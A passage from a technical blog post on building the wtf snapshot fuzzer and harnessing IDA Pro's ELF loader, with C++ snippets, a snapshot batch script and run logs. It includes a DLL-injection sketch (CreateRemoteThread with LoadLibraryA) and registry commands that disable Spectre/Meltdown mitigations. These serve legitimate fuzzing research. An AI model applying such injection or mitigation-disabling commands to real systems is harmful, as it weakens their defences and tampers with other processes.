Not knowing what's happening is also annoying when the guest is bug-checking inside the backend. To address the lack of transparency I decided to generate execution traces that I could use for debugging. It is very rudimentary yet very useful to verify that the execution inside the backend is correct. In addition to this tool, you can always modify your module to add strategic breakpoints and dump registers when you want. Those traces are pretty cool because you get to follow everything that happens in the system: from user-mode to kernel-mode, the page-fault handler, etc.

Those traces can also be loaded in lighthouse to analyze the coverage generated by a particular test case.

Crash detection

The last basic block that I needed was user-mode crash detection. I had done some past work on the user exception handler so I kind of knew my way around it. I decided to hook ntdll!RtlDispatchException & nt!KiRaiseSecurityCheckFailure to detect fail-fast exceptions that can be triggered from stack cookie check failures.
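In practice this kind of detection boils down to a breakpoint whose callback records the test case as a crash and stops the run. The sketch below reuses the SetBreakpoint pattern shown later in this post; SaveCrash and Stop are hypothetical stand-ins for whatever the backend exposes to record the result and stop the virtual CPU.

// Sketch: flag a crash whenever the user-mode exception dispatcher runs.
if (!g_Backend->SetBreakpoint(
        "ntdll!RtlDispatchException", [](Backend_t *Backend) {
          DebugPrint("Hit ntdll!RtlDispatchException, flagging a crash!\n");
          SaveCrash(Backend); // hypothetical: record the crashing test case
          Stop(Backend);      // hypothetical: stop the virtual CPU
        })) {
  return false;
}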

Harnessing IDA: walking barefoot into the desert

Once I was done writing the basic features, I started to harness IDA. I knew I wanted to target the loader plugins and, based on their sizes as well as past vulnerabilities, it felt like looking at the ELF loader was my best chance.

I initially started to harness IDA with its GUI and everything. In retrospect, this was bonkers as I remember handling tons of weird things related to Qt and win32k. After a few weeks of making progress here and there I realized that IDA had a few options to make my life easier:

  • IDA_NO_HISTORY=1 meant that I didn't have to handle as many registry accesses,
  • The -B option allows running IDA in batch-mode from the command line,
  • TVHEADLESS=1 also helped a lot regarding GUI/Qt stuff I was working around.

Some of those options were documented later this year by Igor in this blog post: Igor’s tip of the week #08: Batch mode under the hood.

Inserting test case

After finding those out, it immediately felt like harnessing IDA was possible again. The main problem I had was that IDA reads the input file lazily via fread, fseek, etc. It also reads a bunch of other things like configuration files, the license file, etc.

To be able to deliver my test cases I implemented a layer of hooks that allowed me to pass through file i/o from the guest to my host. This allowed me to read my IDA license keys, the configuration files as well as my input. It also meant that I could sink file writes made to the .id0, .id1, .nam, and all the files that IDA generates that I didn't care about. This was quite a bit of work and it was not really fun work either.

I was not a big fan of this pass-through layer because I was worried that a bug in my code could mean overwriting files on my host or lead to that kind of badness. That is why I decided to replace the pass-through layer with reads from memory buffers. During startup, wtf reads the actual files into buffers and the file-system hooks deliver the bytes as needed. You can see this work in fshooks.cc.

This is an example of what this layer allowed me to do:

bool Ida64ConfigureFsHandleTable(const fs::path &GuestFilesPath) {

  //
  // Those files are files we want to redirect to host files. When there is
  // a hooked i/o targeted to one of them, we deliver the i/o on the host
  // by calling the appropriate syscalls and proxy back the result to the
  // guest.
  //

  const std::vector<std::u16string> GuestFiles = {
      uR"(\??\C:\Program Files\IDA Pro 7.5\ida.key)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\cfg\ida.cfg)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\cfg\noret.cfg)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\cfg\pe.cfg)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\plugins\plugins.cfg)"};

  for (const auto &GuestFile : GuestFiles) {
    const size_t LastSlash = GuestFile.find_last_of(uR"(\)");
    if (LastSlash == GuestFile.npos) {
      fmt::print("Expected a / in {}\n", u16stringToString(GuestFile));
      return false;
    }

    const std::u16string GuestFilename = GuestFile.substr(LastSlash + 1);
    const fs::path HostFile(GuestFilesPath / GuestFilename);

    size_t BufferSize = 0;
    const auto Buffer = ReadFile(HostFile, BufferSize);
    if (Buffer == nullptr || BufferSize == 0) {
      fmt::print("Expected to find {}.\n", HostFile.string());
      return false;
    }

    g_FsHandleTable.MapExistingGuestFile(GuestFile.c_str(), Buffer.get(),
                                         BufferSize);
  }

  g_FsHandleTable.MapExistingWriteableGuestFile(
      uR"(\??\C:\Users\over\Desktop\wtf_input.id0)");
  g_FsHandleTable.MapNonExistingGuestFile(
      uR"(\??\C:\Users\over\Desktop\wtf_input.id1)");
  g_FsHandleTable.MapNonExistingGuestFile(
      uR"(\??\C:\Users\over\Desktop\wtf_input.nam)");
  g_FsHandleTable.MapNonExistingGuestFile(
      uR"(\??\C:\Users\over\Desktop\wtf_input.id2)");

  //
  // Those files are files we want to pretend that they don't exist in the
  // guest.
  //

  const std::vector<std::u16string> NotFounds = {
      uR"(\??\C:\Program Files\IDA Pro 7.5\ida64.int)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\ids\idsnames)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\ids\epoc.zip)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\ids\epoc6.zip)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\ids\epoc9.zip)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\ids\flirt.zip)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\ids\geos.zip)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\ids\linux.zip)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\ids\os2.zip)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\ids\win.zip)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\ids\win7.zip)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\ids\wince.zip)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\loaders\hppacore.idc)",
      uR"(\??\C:\Users\over\AppData\Roaming\Hex-Rays\IDA Pro\proccache64.lst)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\cfg\Latin_1.clt)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\cfg\dwarf.cfg)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\ids\)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\cfg\atrap.cfg)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\cfg\hpux.cfg)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\cfg\i960.cfg)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\cfg\goodname.cfg)"};

  for (const std::u16string &NotFound : NotFounds) {
    g_FsHandleTable.MapNonExistingGuestFile(NotFound.c_str());
  }

  g_FsHandleTable.SetBlacklistDecisionHandler([](const std::u16string &Path) {
    // \ids\pc\api-ms-win-core-profile-l1-1-0.idt
    // \ids\api-ms-win-core-profile-l1-1-0.idt
    // \sig\pc\vc64seh.sig
    // \til\pc\gnulnx_x64.til
    // 6ba8075c8f243566350f741c7d6e9318089add.debug
    const bool IsIdt = Path.ends_with(u".idt");
    const bool IsIds = Path.ends_with(u".ids");
    const bool IsSig = Path.ends_with(u".sig");
    const bool IsTil = Path.ends_with(u".til");
    const bool IsDebug = Path.ends_with(u".debug");
    const bool Blacklisted = IsIdt || IsIds || IsSig || IsTil || IsDebug;

    if (Blacklisted) {
      return true;
    }

    //
    // The parser can invoke ida64!import_module to have the user select
    // a file that gets imported by the binary currently analyzed. This is
    // fine if the import directory is well formatted; when it's not, it
    // potentially uses garbage in the file as a path name. Strategy here
    // is to block the access if the path is not ASCII.
    //

    for (const auto &C : Path) {
      if (isascii(C)) {
        continue;
      }

      DebugPrint("Blocking a weird NtOpenFile: {}\n", u16stringToString(Path));
      return true;
    }

    return false;
  });

  return true;
}

Although this was probably the most annoying problem to deal with, I ran into tons more. I've decided to walk you through some of them.

Problem 1: Pre-load dlls

For IDA to know which loader is the right one to use, it loads all of them and asks each one if it recognizes the file. Remember that there is no disk when running in wtf, so loading a DLL is a problem.

This problem was solved by injecting the DLLs into IDA with inject before generating the snapshot, so that when IDA loads them no file i/o is generated. The same problem happens with delay-loaded DLLs.
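I haven't looked at what the inject utility does internally, but conceptually this is the classic CreateRemoteThread + LoadLibraryA trick. A bare-bones sketch (no error handling) looks like this:

#include <windows.h>
#include <cstring>

// Sketch: force a remote process to load a DLL so the module is already
// mapped when the snapshot gets taken.
bool InjectDll(const DWORD Pid, const char *DllPath) {
  HANDLE Process = OpenProcess(PROCESS_ALL_ACCESS, FALSE, Pid);
  if (Process == nullptr) {
    return false;
  }

  // Copy the DLL path into the target process.
  const SIZE_T Size = strlen(DllPath) + 1;
  void *Remote = VirtualAllocEx(Process, nullptr, Size,
                                MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
  WriteProcessMemory(Process, Remote, DllPath, Size, nullptr);

  // kernel32 is mapped at the same base in every process, so LoadLibraryA's
  // address in our process is also valid in the target.
  const auto LoadLibraryAddress = (LPTHREAD_START_ROUTINE)GetProcAddress(
      GetModuleHandleA("kernel32"), "LoadLibraryA");

  HANDLE Thread = CreateRemoteThread(Process, nullptr, 0, LoadLibraryAddress,
                                     Remote, 0, nullptr);
  WaitForSingleObject(Thread, INFINITE);
  CloseHandle(Thread);
  CloseHandle(Process);
  return true;
}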

Problem 2: Paged-out memory

On Windows, memory can be swapped out and written to disk into the pagefile.sys file. When somebody accesses memory that has been paged out, the access triggers a #PF which the page fault handler resolves by loading the page back up from the pagefile. But again, this generates file i/o.

I solved this problem for user-mode with lockmem which is a small utility that locks all virtual memory ranges into the process working set. As an example, this is the script I used to snapshot IDA and it highlights how I used both inject and lockmem:

set BASE_DIR=C:\Program Files\IDA Pro 7.5
set PLUGINS_DIR=%BASE_DIR%\plugins
set LOADERS_DIR=%BASE_DIR%\loaders
set PROCS_DIR=%BASE_DIR%\procs
set NTSD=C:\Users\over\Desktop\x64\ntsd.exe

REM Remove a bunch of plugins
del "%PLUGINS_DIR%\python.dll"
del "%PLUGINS_DIR%\python64.dll"
[...]
REM Turning on PH
REM 02000000 Enable page heap (full page heap)
reg.exe add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ida64.exe" /v "GlobalFlag" /t REG_SZ /d "0x2000000" /f
REM This is useful to disable stack-traces
reg.exe add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ida64.exe" /v "PageHeapFlags" /t REG_SZ /d "0x0" /f

REM History is stored in the registry and so triggers cr3 change (when attaching to Registry process VA)
set IDA_NO_HISTORY=1
REM Set up headless mode and run IDA
set TVHEADLESS=1
REM https://www.hex-rays.com/products/ida/support/idadoc/417.shtml
start /b %NTSD% -d "%BASE_DIR%\ida64.exe" -B wtf_input

REM bp ida64!init_database
REM Bump suspend count: ~0n
REM Detach: qd
REM Find process, set ba e1 on address from kdbg
REM ntsd -pn ida64.exe ; fix suspend count: ~0m
REM should break.

REM Inject the dlls.
inject.exe ida64.exe "%PLUGINS_DIR%"
inject.exe ida64.exe "%LOADERS_DIR%"
inject.exe ida64.exe "%PROCS_DIR%"
inject.exe ida64.exe "%BASE_DIR%\libdwarf.dll"

REM Lock everything
lockmem.exe ida64.exe

REM You can now reattach; and ~0m to bump down the suspend count
%NTSD% -pn ida64.exe

Problem 3: Manually soft page-fault in memory from hooks

To insert my test cases in memory I used the file system hook layer described above as well as the virtual memory facilities we talked about earlier. Sometimes, the caller would allocate a memory buffer and call, let's say, fread to read the file into the buffer. When fread was invoked, my hook triggered, and sometimes calling VirtWrite would fail. After debugging and inspecting the state of the PTEs, it was clear that the PTE was in an invalid state. This is explained by the fact that memory is lazy on Windows: the page fault handler is expected to be invoked, fix the PTE itself, and let execution carry on. Because we are doing the memory write ourselves, we don't generate a page fault and so the page fault handler never gets invoked.

To solve this, I try to do a virtual to physical translation and inspect the result. If the translation is successful it means the page tables are in a good state and I can perform the memory access. If it is not, I insert a page fault in the guest and resume execution. When execution restarts, the page fault handler runs, fixes the PTE, and returns execution to the instruction that was executing before the page fault. Because we have our hook there, we get reinvoked a second time but this time the virtual to physical translation works and we can do the memory write. Here is an example in ntdll!NtQueryAttributesFile:

if (!g_Backend->SetBreakpoint(
        "ntdll!NtQueryAttributesFile", [](Backend_t *Backend) {
          // NTSTATUS NtQueryAttributesFile(
          //  _In_  POBJECT_ATTRIBUTES      ObjectAttributes,
          //  _Out_ PFILE_BASIC_INFORMATION FileInformation
          //);
          // ...
          //
          // Ensure that the GuestFileInformation is faulted-in memory.
          //

          if (GuestFileInformation &&
              Backend->PageFaultsMemoryIfNeeded(
                  GuestFileInformation, sizeof(FILE_BASIC_INFORMATION))) {
            return;
          }

Problem 4: KVA shadow

When I snapshot IDA, the CPU is in user-mode but some of the breakpoints I set up are on functions living in kernel-mode. To be able to set a breakpoint on those, wtf simply does a VirtTranslate and modifies physical memory with an int3 opcode. This is exactly what KVA Shadow prevents: the user-mode cr3 doesn't contain the part of the page tables that describes kernel-mode (only a few stubs), and so there is no valid translation.
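Put differently, setting a kernel breakpoint looks roughly like the sketch below (reusing the hypothetical translation helpers from the earlier sketches), and with KVA shadow enabled the translation step is exactly what fails:

#include <cstdint>
#include <optional>

// Hypothetical helpers from the earlier sketches.
extern std::optional<uint64_t> VirtTranslate(uint64_t Cr3, uint64_t Gva);
extern uint8_t *PhysTranslate(uint64_t Gpa);

// Sketch: patch an int3 (0xcc) over a kernel-mode symbol.
bool SetKernelBreakpoint(const uint64_t UserCr3, const uint64_t KernelGva) {
  const auto Gpa = VirtTranslate(UserCr3, KernelGva);
  if (!Gpa) {
    // With KVA shadow, the user-mode cr3 has no mapping for most kernel
    // addresses, so we end up here.
    return false;
  }

  *PhysTranslate(*Gpa) = 0xcc;
  return true;
}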

To solve this I simply disabled KVA shadow with the below edits in the registry:

REM To disable mitigations for CVE-2017-5715 (Spectre Variant 2) and CVE-2017-5754 (Meltdown)
REM https://support.microsoft.com/en-us/help/4072698/windows-server-speculative-execution-side-channel-vulnerabilities
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management" /v FeatureSettingsOverride /t REG_DWORD /d 3 /f
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management" /v FeatureSettingsOverrideMask /t REG_DWORD /d 3 /f

Problem 5: Identifying bottlenecks

While developing wtf I allocated time to profile the tool under specific workloads with the Intel V-Tune Profiler, which is now free. If you have never used it, you really should as it is both absolutely fascinating and really useful. If you care about performance, you need to measure to understand better where you can have the most impact. Not measuring is a big mistake because you will most likely spend time changing code that might not even matter. If you try to optimize something, you should also be able to measure the impact of your change.

For example, below is the V-Tune hotspot analysis report for the following invocation:

wtf.exe run --name hevd --backend whv --state targets\hevd\state --runs=100000 --input targets\hevd\crashes\crash-0xfffff764b91c0000-0x0-0xffffbf84fb10e780-0x2-0x0

(V-Tune hotspot analysis screenshot)

This report is really catastrophic because it means we spend twice as much time dealing with memory access faults as actually running target code. Handling memory access faults should take very little time. If anybody knows their way around whv & performance, it'd be great to reach out because I really have no idea why it is that slow.

The birth of hope

After tons of work, I could finally execute the ELF loader from start to end and see the messages you would see in the output window. In the output below, you can see IDA loading the elf64.dll loader, then initializing the database as well as the btree. Then, it loads up processor modules, creates segments, processes relocations, and finally loads the dwarf modules to parse debug information:

>wtf.exe run --name ida64-elf75 --backend whv --state state --input ntfs-3g
Initializing the debugger instance.. (this takes a bit of time)
Parsing coverage\dwarf64.cov..
Parsing coverage\elf64.cov..
Parsing coverage\libdwarf.cov..
Applied 43624 code coverage breakpoints
[...]
Running ntfs-3g
[...]
ida64: kernelbase!LoadLibraryA(C:\Program Files\IDA Pro 7.5\loaders\elf64.dll)
ida64: ida64!msg(format="Possible file format: %s (%s) ", ...)
ida64: ELF64 for x86-64 (Shared object) - ELF64 for x86-64 (Shared object)
[...]
ida64: ida64!msg(format="   bytes   pages size description --------- ----- ---- -------------------------------------------- %9lu %5u %4u allocating memory for b-tree... ", ...)
ida64: ida64!msg(format="%9u %5u %4u allocating memory for virtual array... ", ...)
ida64: ida64!msg(format="%9u %5u %4u allocating memory for name pointers... ----------------------------------------------------------------- %9u
total memory allocated  ", ...)
ida64: kernelbase!LoadLibraryA(C:\Program Files\IDA Pro 7.5\procs\78k064.dll)
ida64: kernelbase!LoadLibraryA(C:\Program Files\IDA Pro 7.5\procs\78k0s64.dll)
ida64: kernelbase!LoadLibraryA(C:\Program Files\IDA Pro 7.5\procs\ad218x64.dll)
ida64: kernelbase!LoadLibraryA(C:\Program Files\IDA Pro 7.5\procs\alpha64.dll)
[...]
ida64: ida64!msg(format="Loading file '%s' into database... Detected file format: %s ", ...)
ida64: ida64!msg(format="Loading processor module %s for %s...", ...)
ida64: ida64!msg(format="Initializing processor module %s...", ...)
ida64: ida64!msg(format="OK ", ...)
ida64: ida64!mbox(format="@0:1139[] Can't use BIOS comments base.", ...)
ida64: ida64!msg(format="%s -> %s ", ...)
ida64: ida64!msg(format="Autoanalysis subsystem has been initialized. ", ...)
ida64: ida64!msg(format="%3d. Creating a new segment  (%08a-%08a) ...", ...)
ida64: ida64!msg(format=" ... OK ", ...)
ida64: ida64!msg(format="%3d. Creating a new segment  (%08a-%08a) ...", ...)
ida64: ida64!msg(format=" ... OK ", ...)
ida64: ida64!msg(format="%s -> %s ", ...)
[...]
ida64: ida64!msg(format="%3d. Creating a new segment  (%08a-%08a) ...", ...)
ida64: ida64!msg(format=" ... OK ", ...)
ida64: ida64!msg(format="%3d. Creating a new segment  (%08a-%08a) ...", ...)
ida64: ida64!msg(format=" ... OK ", ...)
ida64: ida64!msg(format="%3d. Creating a new segment  (%08a-%08a) ...", ...)
ida64: ida64!msg(format=" ... OK ", ...)
ida64: ida64!msg(format="%3d. Creating a new segment  (%08a-%08a) ...", ...)
ida64: ida64!msg(format=" ... OK ", ...)
ida64: ida64!msg(format="%3d. Creating a new segment  (%08a-%08a) ...", ...)
ida64: ida64!msg(format=" ... OK ", ...)
ida64: ida64!mbox(format="Reading symbols", ...)
ida64: ida64!msg(format="%3d. Creating a new segment  (%08a-%08a) ...", ...)
ida64: ida64!msg(format=" ... OK ", ...)
ida64: ida64!mbox(format="Loading symbols", ...)
ida64: ida64!msg(format="%3d. Creating a new segment  (%08a-%08a) ...", ...)
ida64: ida64!msg(format=" ... OK ", ...)
ida64: ida64!mbox(format="", ...)
ida64: ida64!msg(format="Processing relocations... ", ...)
ida64: ida64!msg(format="%a: could not patch the PLT stub; unexpected PLT format or the file has been modified after linking! ", ...)
ida64: ida64!mbox(format="Unexpected entries in the PLT stub. The file might have been modified after linking.", ...)
ida64: ida64!msg(format="%s -> %s ", ...)
ida64: Unexpected entries in the PLT stub.
The file might have been modified after linking.
ida64: ida64!msg(format="%a: could not patch the PLT stub; unexpected PLT format or the file has been modified after linking! ", ...)
[...]
ida64: ida64!msg(format="%a: could not patch the PLT stub; unexpected PLT format or the file has been modified after linking! ", ...)
ida64: ida64!msg(format="%a: could not patch the PLT stub; unexpected PLT format or the file has been modified after linking! ", ...)
ida64: ida64!msg(format="%a: could not patch the PLT stub; unexpected PLT format or the file has been modified after linking! ", ...)
ida64: ida64!msg(format="%a: could not patch the PLT stub; unexpected PLT format or the file has been modified after linking! ", ...)
ida64: kernelbase!LoadLibraryA(C:\Program Files\IDA Pro 7.5\plugins\dbg64.dll)
ida64: kernelbase!LoadLibraryA(C:\Program Files\IDA Pro 7.5\plugins\dwarf64.dll)
ida64: kernelbase!LoadLibraryA(C:\Program Files\IDA Pro 7.5\libdwarf.dll)
ida64: ida64!msg(format="%s", ...)
ida64: ida64!msg(format="no. ", ...)
ida64: ida64!msg(format="%s", ...)
ida64: ida64!msg(format="no. ", ...)
ida64: ida64!msg(format="Plugin "%s" not found ", ...)
ida64: Hit the end of load file :o

Need for speed: whv backend

At this point, I was able to fuzz IDA but the speed was incredibly slow. I could execute about 0.01 test cases per second. It was really cool to see it working, finding new code coverage, etc. but I felt I wouldn't find much at this speed. That's why I decided to look at using whv to implement an execution backend.

I had played around with whv before with pywinhv so I knew the features offered by the API well. As this was the first execution backend using virtualization I had to rethink a bunch of the fundamentals.

Code coverage

What I settled for is to use one-time software breakpoints at the beginning of basic blocks. The user simply needs to generate a list of breakpoint addresses into a JSON file and wtf consumes this file during initialization. This means that the user can selectively pick the modules that it wants coverage for.

It is annoying though because it means you need to throw those modules in IDA and generate the JSON file for each of them. The script I use for that is available here: gen_coveragefile_ida.py. You could obviously generate the file yourself via other tools.

Overall I think it is a good enough tradeoff. I did try to play with more creative & esoteric ways to acquire code coverage though, such as filling the address space with int3s and lazily populating code by leveraging a length-disassembler engine to know the size of instructions. I loved this idea but I ran into tons of problems with switch tables that embed data in code sections. This means that wtf corrupts them when setting software breakpoints, which leads to a bunch of spectacular crashes a little bit everywhere in the system, so I abandoned this idea. The trap flag was awfully slow and whv doesn't expose the Monitor Trap Flag.

The ideal for me would be to find a way to conserve the performance and acquire code coverage without knowing anything about the target, like in bochscpu.

Dirty memory

The other thing that I needed was to be able to track dirty memory. whv provides WHvQueryGpaRangeDirtyBitmap to do just that, which was perfect.

Tracing

One thing that I would have loved was to be able to generate execution traces like with bochscpu. I initially thought I'd be able to mirror this functionality using the trap flag. But if you turn on the trap flag right before, let's say, a syscall instruction, the fault gets raised only after the instruction, and so you miss the entire kernel side executing. I discovered that this is due to how syscall is implemented: it masks RFLAGS with the IA32_FMASK MSR, stripping away the trap flag. After programming IA32_FMASK myself I could trace through syscalls, which was great. By comparing traces generated by the two backends, I noticed that the whv trace was missing page faults. This is basically another instance of the same problem: when an interruption happens the CPU saves the current context and loads a new one from the task segment which doesn't have the trap flag. I can't remember if I got that working or if this turned out to be harder than it looked, but I ended up reverting the code and settled for only generating code coverage traces. It is definitely something I would love to revisit in the future.
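For reference, IA32_FMASK (MSR 0xC0000084) lists the RFLAGS bits that syscall clears, so keeping single-stepping alive across the transition is just a matter of clearing the trap-flag bit (bit 8) in the snapshot's Sfmask before it gets loaded. A minimal sketch, using the CpuState_t field shown earlier:

// Sketch: keep RFLAGS.TF (bit 8) alive across syscall by removing it from
// the IA32_FMASK value captured in the snapshot.
void KeepTrapFlagAcrossSyscalls(CpuState_t &State) {
  constexpr uint64_t RflagsTf = 1ULL << 8;
  State.Sfmask &= ~RflagsTf;
}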

Timeout

To protect the fuzzer against infinite loops and to limit the execution time, I use a timer to tell the virtual processor to stop execution. This is not as good as what bochscpu offered us because it is not as precise, but it's the only solution I could come up with:

class TimerQ_t {
  HANDLE TimerQueue_ = nullptr;
  HANDLE LastTimer_ = nullptr;

  static void CALLBACK AlarmHandler(PVOID, BOOLEAN) {
    reinterpret_cast<WhvBackend_t *>(g_Backend)->CancelRunVirtualProcessor();
  }

public:
  ~TimerQ_t() {
    if (TimerQueue_) {
      DeleteTimerQueueEx(TimerQueue_, nullptr);
    }
  }

  TimerQ_t() = default;
  TimerQ_t(const TimerQ_t &) = delete;
  TimerQ_t &operator=(const TimerQ_t &) = delete;

  void SetTimer(const uint32_t Seconds) {
    if (Seconds == 0) {
      return;
    }

    if (!TimerQueue_) {
      TimerQueue_ = CreateTimerQueue();
      if (!TimerQueue_) {
        fmt::print("CreateTimerQueue failed.\n");
        exit(1);
      }
    }

    if (!CreateTimerQueueTimer(&LastTimer_, TimerQueue_, AlarmHandler,
                                nullptr, Seconds * 1000, Seconds * 1000, 0)) {
      fmt::print("CreateTimerQueueTimer failed.\n");
      exit(1);
    }
  }

  void TerminateLastTimer() {
    DeleteTimerQueueTimer(TimerQueue_, LastTimer_, nullptr);
  }
};

Inserting page faults

To be able to insert a page fault into the guest I use the WHvRegisterPendingEvent register and a WHvX64PendingEventException event type:

bool WhvBackend_t::PageFaultsMemoryIfNeeded(const Gva_t Gva,
                                            const uint64_t Size) {
  const Gva_t PageToFault = GetFirstVirtualPageToFault(Gva, Size);

  //
  // If we haven't found any GVA to fault-in then we have no job to do so we
  // return.
  //

  if (PageToFault == Gva_t(0xffffffffffffffff)) {
    return false;
  }

  WhvDebugPrint("Inserting page fault for GVA {:#x}\n", PageToFault);

  // cf 'VM-Entry Controls for Event Injection' in Intel 3C
  WHV_REGISTER_VALUE_t Exception;
  Exception->ExceptionEvent.EventPending = 1;
  Exception->ExceptionEvent.EventType = WHvX64PendingEventException;
  Exception->ExceptionEvent.DeliverErrorCode = 1;
  Exception->ExceptionEvent.Vector = WHvX64ExceptionTypePageFault;
  Exception->ExceptionEvent.ErrorCode = ErrorWrite | ErrorUser;
  Exception->ExceptionEvent.ExceptionParameter = PageToFault.U64();

  if (FAILED(SetRegister(WHvRegisterPendingEvent, &Exception))) {
    __debugbreak();
  }

  return true;
}

Determinism

The last feature that I wanted was to try to get as much determinism as I could. After tracing a bunch of executions, I realized that nt!ExGenRandom uses rdrand in the Windows kernel and this was a big source of non-determinism across executions. Intel does support generating a vmexit when the instruction is executed, but this is also not exposed by whv.

I settled for a breakpoint on the function and emulated its behavior with a deterministic implementation:

//
// Make ExGenRandom deterministic.
//
// kd> ub fffff805`3b8287c4 l1
// nt!ExGenRandom+0xe0:
// fffff805`3b8287c0 480fc7f2        rdrand  rdx
const Gva_t ExGenRandom = Gva_t(g_Dbg.GetSymbol("nt!ExGenRandom") + 0xe4);
if (!g_Backend->SetBreakpoint(ExGenRandom, [](Backend_t *Backend) {
      DebugPrint("Hit ExGenRandom!\n");
      Backend->Rdx(Backend->Rdrand());
    })) {
  return false;
}

I am not a huge fan of this solution because it means you need to know where non-determinism is coming from, which is usually hard to figure out in the first place. Another source of non-determinism is the timestamp counter. As far as I can tell, this hasn't led to any major issues so far, but it might bite us in the future.

With the above implemented, I was able to run test cases through the backend end to end which was great. Below I describe some of the problems I solved while testing it.

Problem 6: Code coverage breakpoints not free

Profiling wtf revealed that the code coverage breakpoints I thought were free were not quite that free. In theory, they are one-time breakpoints and, as a result, you pay their cost only once. This leads to a warm-up cost that you pay at the start of a run while the fuzzer discovers the highly reachable sections of code, but over time it should become negligible.

The problem in my implementation was in the code used to restore those breakpoints after executing a test case. I tracked the code coverage breakpoints that hadn't been hit in a list. When restoring, I would start by restoring every dirty page and then I would iterate through this list to reset the code-coverage breakpoints. It turns out this was highly inefficient when you have hundreds of thousands of breakpoints.

I did what you usually do when you have a performance problem: I traded CPU time for memory. The answer to this problem is the Ram_t class. The way it works is that every time you add a code coverage breakpoint, it duplicates the page and sets a breakpoint both in this copy and in the guest RAM.

//
// Add a breakpoint to a GPA.
//

uint8_t *AddBreakpoint(const Gpa_t Gpa) {
  const Gpa_t AlignedGpa = Gpa.Align();
  uint8_t *Page = nullptr;

  //
  // Grab the page if we have it in the cache
  //

  if (Cache_.contains(Gpa.Align())) {
    Page = Cache_.at(AlignedGpa);
  }

  //
  // Or allocate and initialize one!
  //

  else {
    Page = (uint8_t *)aligned_alloc(Page::Size, Page::Size);
    if (Page == nullptr) {
      fmt::print("Failed to call aligned_alloc.\n");
      return nullptr;
    }

    const uint8_t *Virgin =
        Dmp_.GetPhysicalPage(AlignedGpa.U64()) + AlignedGpa.Offset().U64();
    if (Virgin == nullptr) {
      fmt::print(
          "The dump does not have a page backing GPA {:#x}, exiting.\n",
          AlignedGpa);
      return nullptr;
    }

    memcpy(Page, Virgin, Page::Size);
  }

  //
  // Apply the breakpoint.
  //

  const uint64_t Offset = Gpa.Offset().U64();
  Page[Offset] = 0xcc;
  Cache_.emplace(AlignedGpa, Page);

  //
  // And also update the RAM.
  //

  Ram_[Gpa.U64()] = 0xcc;
  return &Page[Offset];
}

When a code coverage breakpoint is hit, the class removes the breakpoint from both of those locations.

//
// Remove a breakpoint from a GPA.
//

void RemoveBreakpoint(const Gpa_t Gpa) {
  const uint8_t *Virgin = GetHvaFromDump(Gpa);
  uint8_t *Cache = GetHvaFromCache(Gpa);

  //
  // Update the RAM.
  //

  Ram_[Gpa.U64()] = *Virgin;

  //
  // Update the cache. We assume that an entry is available in the cache.
  //

  *Cache = *Virgin;
}

When you restore dirty memory, you simply iterate through the dirty pages and ask the Ram_t class to restore the content of each page. Internally, the class checks if the page has been duplicated and, if so, restores from this copy. If it doesn't have one, it restores the content from the dump file. This lets us restore code coverage breakpoints at the cost of extra memory:

//
// Restore a GPA from the cache or from the dump file if no entry is
// available in the cache.
//

const uint8_t *Restore(const Gpa_t Gpa) {
  //
  // Get the HVA for the page we want to restore.
  //

  const uint8_t *SrcHva = GetHva(Gpa);

  //
  // Get the HVA for the page in RAM.
  //

  uint8_t *DstHva = Ram_ + Gpa.Align().U64();

  //
  // It is possible for a GPA to not exist in our cache and in the dump file.
  // For this to make sense, you have to remember that the crash-dump does not
  // contain the whole amount of RAM. In which case, the guest OS can decide
  // to allocate new memory backed by physical pages that were not dumped
  // because not currently used by the OS.
  //
  // When this happens, we simply zero initialize the page as.. this is
  // basically the best we can do. The hope is that if this behavior is not
  // correct, the rest of the execution simply explodes pretty fast.
  //

  if (!SrcHva) {
    memset(DstHva, 0, Page::Size);
  }

  //
  // Otherwise, this is straight forward, we restore the source into the
  // destination. If we had a copy, then that is what we are writing to the
  // destination, and if we didn't have a copy then we are restoring the
  // content from the crash-dump.
  //

  else {
    memcpy(DstHva, SrcHva, Page::Size);
  }

  //
  // Return the HVA to the user in case it needs to know about it.
  //

  return DstHva;
}

Problem 7: Code coverage with IDA

I mentioned above that I was using IDA to generate the list of code coverage breakpoints that wtf needed. At first, I thought this was a bulletproof technique, but I encountered a pretty annoying bug where IDA was tagging switch-tables as code instead of data. This led to wtf corrupting switch-tables with cc's and to the guest crashing in spectacular ways.

I haven't run into this bug with the latest version of IDA yet, which is nice.

Problem 8: Rounds of optimization

After profiling the fuzzer, I noticed that WHvQueryGpaRangeDirtyBitmap was extremely slow for unknown reasons.

To fix this, I ended up emulating the feature by mapping memory as read / execute in the EPT and tracking dirtiness myself when receiving a memory fault caused by a write.

HRESULT
WhvBackend_t::OnExitReasonMemoryAccess(
    const WHV_RUN_VP_EXIT_CONTEXT &Exception) {
  const Gpa_t Gpa = Gpa_t(Exception.MemoryAccess.Gpa);
  const bool WriteAccess =
      Exception.MemoryAccess.AccessInfo.AccessType == WHvMemoryAccessWrite;

